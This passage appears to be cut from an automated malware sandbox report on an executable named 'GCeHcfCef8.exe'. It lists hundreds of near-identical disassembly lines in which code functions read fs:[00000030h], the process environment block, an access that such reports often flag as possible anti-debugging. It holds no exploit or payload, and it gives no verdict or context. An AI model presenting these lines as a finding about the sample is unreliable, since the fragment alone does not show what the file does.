          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E6259 mov eax, dword ptr fs:[00000030h]2_2_016E6259
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DA250 mov eax, dword ptr fs:[00000030h]2_2_016DA250
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016D823B mov eax, dword ptr fs:[00000030h]2_2_016D823B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F02E1 mov eax, dword ptr fs:[00000030h]2_2_016F02E1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F02E1 mov eax, dword ptr fs:[00000030h]2_2_016F02E1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F02E1 mov eax, dword ptr fs:[00000030h]2_2_016F02E1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA2C3 mov eax, dword ptr fs:[00000030h]2_2_016EA2C3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA2C3 mov eax, dword ptr fs:[00000030h]2_2_016EA2C3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA2C3 mov eax, dword ptr fs:[00000030h]2_2_016EA2C3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA2C3 mov eax, dword ptr fs:[00000030h]2_2_016EA2C3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA2C3 mov eax, dword ptr fs:[00000030h]2_2_016EA2C3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F02A0 mov eax, dword ptr fs:[00000030h]2_2_016F02A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F02A0 mov eax, dword ptr fs:[00000030h]2_2_016F02A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017762A0 mov eax, dword ptr fs:[00000030h]2_2_017762A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017762A0 mov ecx, dword ptr fs:[00000030h]2_2_017762A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017762A0 mov eax, dword ptr fs:[00000030h]2_2_017762A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017762A0 mov eax, dword ptr fs:[00000030h]2_2_017762A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017762A0 mov eax, dword ptr fs:[00000030h]2_2_017762A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017762A0 mov eax, dword ptr fs:[00000030h]2_2_017762A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01760283 mov eax, dword ptr fs:[00000030h]2_2_01760283
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01760283 mov eax, dword ptr fs:[00000030h]2_2_01760283
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01760283 mov eax, dword ptr fs:[00000030h]2_2_01760283
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E284 mov eax, dword ptr fs:[00000030h]2_2_0171E284
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E284 mov eax, dword ptr fs:[00000030h]2_2_0171E284
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171656A mov eax, dword ptr fs:[00000030h]2_2_0171656A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171656A mov eax, dword ptr fs:[00000030h]2_2_0171656A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171656A mov eax, dword ptr fs:[00000030h]2_2_0171656A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8550 mov eax, dword ptr fs:[00000030h]2_2_016E8550
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8550 mov eax, dword ptr fs:[00000030h]2_2_016E8550
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E53E mov eax, dword ptr fs:[00000030h]2_2_0170E53E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E53E mov eax, dword ptr fs:[00000030h]2_2_0170E53E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E53E mov eax, dword ptr fs:[00000030h]2_2_0170E53E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E53E mov eax, dword ptr fs:[00000030h]2_2_0170E53E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E53E mov eax, dword ptr fs:[00000030h]2_2_0170E53E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0535 mov eax, dword ptr fs:[00000030h]2_2_016F0535
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0535 mov eax, dword ptr fs:[00000030h]2_2_016F0535
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0535 mov eax, dword ptr fs:[00000030h]2_2_016F0535
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0535 mov eax, dword ptr fs:[00000030h]2_2_016F0535
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0535 mov eax, dword ptr fs:[00000030h]2_2_016F0535
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0535 mov eax, dword ptr fs:[00000030h]2_2_016F0535
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01776500 mov eax, dword ptr fs:[00000030h]2_2_01776500
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B4500 mov eax, dword ptr fs:[00000030h]2_2_017B4500
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B4500 mov eax, dword ptr fs:[00000030h]2_2_017B4500
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B4500 mov eax, dword ptr fs:[00000030h]2_2_017B4500
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B4500 mov eax, dword ptr fs:[00000030h]2_2_017B4500
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B4500 mov eax, dword ptr fs:[00000030h]2_2_017B4500
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B4500 mov eax, dword ptr fs:[00000030h]2_2_017B4500
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B4500 mov eax, dword ptr fs:[00000030h]2_2_017B4500
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E25E0 mov eax, dword ptr fs:[00000030h]2_2_016E25E0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E5E7 mov eax, dword ptr fs:[00000030h]2_2_0170E5E7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E5E7 mov eax, dword ptr fs:[00000030h]2_2_0170E5E7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E5E7 mov eax, dword ptr fs:[00000030h]2_2_0170E5E7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E5E7 mov eax, dword ptr fs:[00000030h]2_2_0170E5E7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E5E7 mov eax, dword ptr fs:[00000030h]2_2_0170E5E7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E5E7 mov eax, dword ptr fs:[00000030h]2_2_0170E5E7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E5E7 mov eax, dword ptr fs:[00000030h]2_2_0170E5E7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170E5E7 mov eax, dword ptr fs:[00000030h]2_2_0170E5E7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171C5ED mov eax, dword ptr fs:[00000030h]2_2_0171C5ED
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171C5ED mov eax, dword ptr fs:[00000030h]2_2_0171C5ED
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A5D0 mov eax, dword ptr fs:[00000030h]2_2_0171A5D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A5D0 mov eax, dword ptr fs:[00000030h]2_2_0171A5D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E5CF mov eax, dword ptr fs:[00000030h]2_2_0171E5CF
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E5CF mov eax, dword ptr fs:[00000030h]2_2_0171E5CF
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E65D0 mov eax, dword ptr fs:[00000030h]2_2_016E65D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017045B1 mov eax, dword ptr fs:[00000030h]2_2_017045B1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017045B1 mov eax, dword ptr fs:[00000030h]2_2_017045B1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017605A7 mov eax, dword ptr fs:[00000030h]2_2_017605A7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017605A7 mov eax, dword ptr fs:[00000030h]2_2_017605A7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017605A7 mov eax, dword ptr fs:[00000030h]2_2_017605A7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E2582 mov eax, dword ptr fs:[00000030h]2_2_016E2582
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E2582 mov ecx, dword ptr fs:[00000030h]2_2_016E2582
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E59C mov eax, dword ptr fs:[00000030h]2_2_0171E59C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01714588 mov eax, dword ptr fs:[00000030h]2_2_01714588
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170A470 mov eax, dword ptr fs:[00000030h]2_2_0170A470
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170A470 mov eax, dword ptr fs:[00000030h]2_2_0170A470
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170A470 mov eax, dword ptr fs:[00000030h]2_2_0170A470
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176C460 mov ecx, dword ptr fs:[00000030h]2_2_0176C460
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170245A mov eax, dword ptr fs:[00000030h]2_2_0170245A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179A456 mov eax, dword ptr fs:[00000030h]2_2_0179A456
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016D645D mov eax, dword ptr fs:[00000030h]2_2_016D645D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]2_2_0171E443
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]2_2_0171E443
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]2_2_0171E443
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]2_2_0171E443
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]2_2_0171E443
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]2_2_0171E443
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]2_2_0171E443
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E443 mov eax, dword ptr fs:[00000030h]2_2_0171E443
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A430 mov eax, dword ptr fs:[00000030h]2_2_0171A430
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DC427 mov eax, dword ptr fs:[00000030h]2_2_016DC427
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DE420 mov eax, dword ptr fs:[00000030h]2_2_016DE420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DE420 mov eax, dword ptr fs:[00000030h]2_2_016DE420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DE420 mov eax, dword ptr fs:[00000030h]2_2_016DE420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]2_2_01766420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]2_2_01766420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]2_2_01766420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]2_2_01766420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]2_2_01766420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]2_2_01766420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01766420 mov eax, dword ptr fs:[00000030h]2_2_01766420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01718402 mov eax, dword ptr fs:[00000030h]2_2_01718402
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01718402 mov eax, dword ptr fs:[00000030h]2_2_01718402
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01718402 mov eax, dword ptr fs:[00000030h]2_2_01718402
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E04E5 mov ecx, dword ptr fs:[00000030h]2_2_016E04E5
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017144B0 mov ecx, dword ptr fs:[00000030h]2_2_017144B0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E64AB mov eax, dword ptr fs:[00000030h]2_2_016E64AB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176A4B0 mov eax, dword ptr fs:[00000030h]2_2_0176A4B0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179A49A mov eax, dword ptr fs:[00000030h]2_2_0179A49A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E8770 mov eax, dword ptr fs:[00000030h]2_2_016E8770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0770 mov eax, dword ptr fs:[00000030h]2_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722750 mov eax, dword ptr fs:[00000030h]2_2_01722750
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722750 mov eax, dword ptr fs:[00000030h]2_2_01722750
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01764755 mov eax, dword ptr fs:[00000030h]2_2_01764755
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176E75D mov eax, dword ptr fs:[00000030h]2_2_0176E75D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171674D mov esi, dword ptr fs:[00000030h]2_2_0171674D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171674D mov eax, dword ptr fs:[00000030h]2_2_0171674D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171674D mov eax, dword ptr fs:[00000030h]2_2_0171674D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0750 mov eax, dword ptr fs:[00000030h]2_2_016E0750
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175C730 mov eax, dword ptr fs:[00000030h]2_2_0175C730
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171273C mov eax, dword ptr fs:[00000030h]2_2_0171273C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171273C mov ecx, dword ptr fs:[00000030h]2_2_0171273C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171273C mov eax, dword ptr fs:[00000030h]2_2_0171273C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171C720 mov eax, dword ptr fs:[00000030h]2_2_0171C720
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171C720 mov eax, dword ptr fs:[00000030h]2_2_0171C720
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01710710 mov eax, dword ptr fs:[00000030h]2_2_01710710
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171C700 mov eax, dword ptr fs:[00000030h]2_2_0171C700
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0710 mov eax, dword ptr fs:[00000030h]2_2_016E0710
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E47FB mov eax, dword ptr fs:[00000030h]2_2_016E47FB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E47FB mov eax, dword ptr fs:[00000030h]2_2_016E47FB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176E7E1 mov eax, dword ptr fs:[00000030h]2_2_0176E7E1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017027ED mov eax, dword ptr fs:[00000030h]2_2_017027ED
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017027ED mov eax, dword ptr fs:[00000030h]2_2_017027ED
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017027ED mov eax, dword ptr fs:[00000030h]2_2_017027ED
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EC7C0 mov eax, dword ptr fs:[00000030h]2_2_016EC7C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017607C3 mov eax, dword ptr fs:[00000030h]2_2_017607C3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E07AF mov eax, dword ptr fs:[00000030h]2_2_016E07AF
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017947A0 mov eax, dword ptr fs:[00000030h]2_2_017947A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178678E mov eax, dword ptr fs:[00000030h]2_2_0178678E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01712674 mov eax, dword ptr fs:[00000030h]2_2_01712674
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A660 mov eax, dword ptr fs:[00000030h]2_2_0171A660
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A660 mov eax, dword ptr fs:[00000030h]2_2_0171A660
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A866E mov eax, dword ptr fs:[00000030h]2_2_017A866E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A866E mov eax, dword ptr fs:[00000030h]2_2_017A866E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FC640 mov eax, dword ptr fs:[00000030h]2_2_016FC640
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E262C mov eax, dword ptr fs:[00000030h]2_2_016E262C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FE627 mov eax, dword ptr fs:[00000030h]2_2_016FE627
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01716620 mov eax, dword ptr fs:[00000030h]2_2_01716620
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01718620 mov eax, dword ptr fs:[00000030h]2_2_01718620
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01722619 mov eax, dword ptr fs:[00000030h]2_2_01722619
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E609 mov eax, dword ptr fs:[00000030h]2_2_0175E609
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E6F2 mov eax, dword ptr fs:[00000030h]2_2_0175E6F2
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E6F2 mov eax, dword ptr fs:[00000030h]2_2_0175E6F2
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E6F2 mov eax, dword ptr fs:[00000030h]2_2_0175E6F2
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E6F2 mov eax, dword ptr fs:[00000030h]2_2_0175E6F2
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017606F1 mov eax, dword ptr fs:[00000030h]2_2_017606F1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017606F1 mov eax, dword ptr fs:[00000030h]2_2_017606F1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0171A6C7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171A6C7 mov eax, dword ptr fs:[00000030h]2_2_0171A6C7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017166B0 mov eax, dword ptr fs:[00000030h]2_2_017166B0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171C6A6 mov eax, dword ptr fs:[00000030h]2_2_0171C6A6
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E4690 mov eax, dword ptr fs:[00000030h]2_2_016E4690
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E4690 mov eax, dword ptr fs:[00000030h]2_2_016E4690
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01784978 mov eax, dword ptr fs:[00000030h]2_2_01784978
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01784978 mov eax, dword ptr fs:[00000030h]2_2_01784978
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176C97C mov eax, dword ptr fs:[00000030h]2_2_0176C97C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01706962 mov eax, dword ptr fs:[00000030h]2_2_01706962
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01706962 mov eax, dword ptr fs:[00000030h]2_2_01706962
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01706962 mov eax, dword ptr fs:[00000030h]2_2_01706962
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0172096E mov eax, dword ptr fs:[00000030h]2_2_0172096E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0172096E mov edx, dword ptr fs:[00000030h]2_2_0172096E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0172096E mov eax, dword ptr fs:[00000030h]2_2_0172096E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01760946 mov eax, dword ptr fs:[00000030h]2_2_01760946
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176892A mov eax, dword ptr fs:[00000030h]2_2_0176892A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0177892B mov eax, dword ptr fs:[00000030h]2_2_0177892B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176C912 mov eax, dword ptr fs:[00000030h]2_2_0176C912
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016D8918 mov eax, dword ptr fs:[00000030h]2_2_016D8918
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016D8918 mov eax, dword ptr fs:[00000030h]2_2_016D8918
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E908 mov eax, dword ptr fs:[00000030h]2_2_0175E908
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175E908 mov eax, dword ptr fs:[00000030h]2_2_0175E908
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017129F9 mov eax, dword ptr fs:[00000030h]2_2_017129F9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017129F9 mov eax, dword ptr fs:[00000030h]2_2_017129F9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176E9E0 mov eax, dword ptr fs:[00000030h]2_2_0176E9E0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017149D0 mov eax, dword ptr fs:[00000030h]2_2_017149D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AA9D3 mov eax, dword ptr fs:[00000030h]2_2_017AA9D3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017769C0 mov eax, dword ptr fs:[00000030h]2_2_017769C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]2_2_016EA9D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]2_2_016EA9D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]2_2_016EA9D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]2_2_016EA9D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]2_2_016EA9D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EA9D0 mov eax, dword ptr fs:[00000030h]2_2_016EA9D0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E09AD mov eax, dword ptr fs:[00000030h]2_2_016E09AD
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E09AD mov eax, dword ptr fs:[00000030h]2_2_016E09AD
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017689B3 mov esi, dword ptr fs:[00000030h]2_2_017689B3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017689B3 mov eax, dword ptr fs:[00000030h]2_2_017689B3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017689B3 mov eax, dword ptr fs:[00000030h]2_2_017689B3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A0 mov eax, dword ptr fs:[00000030h]2_2_016F29A0
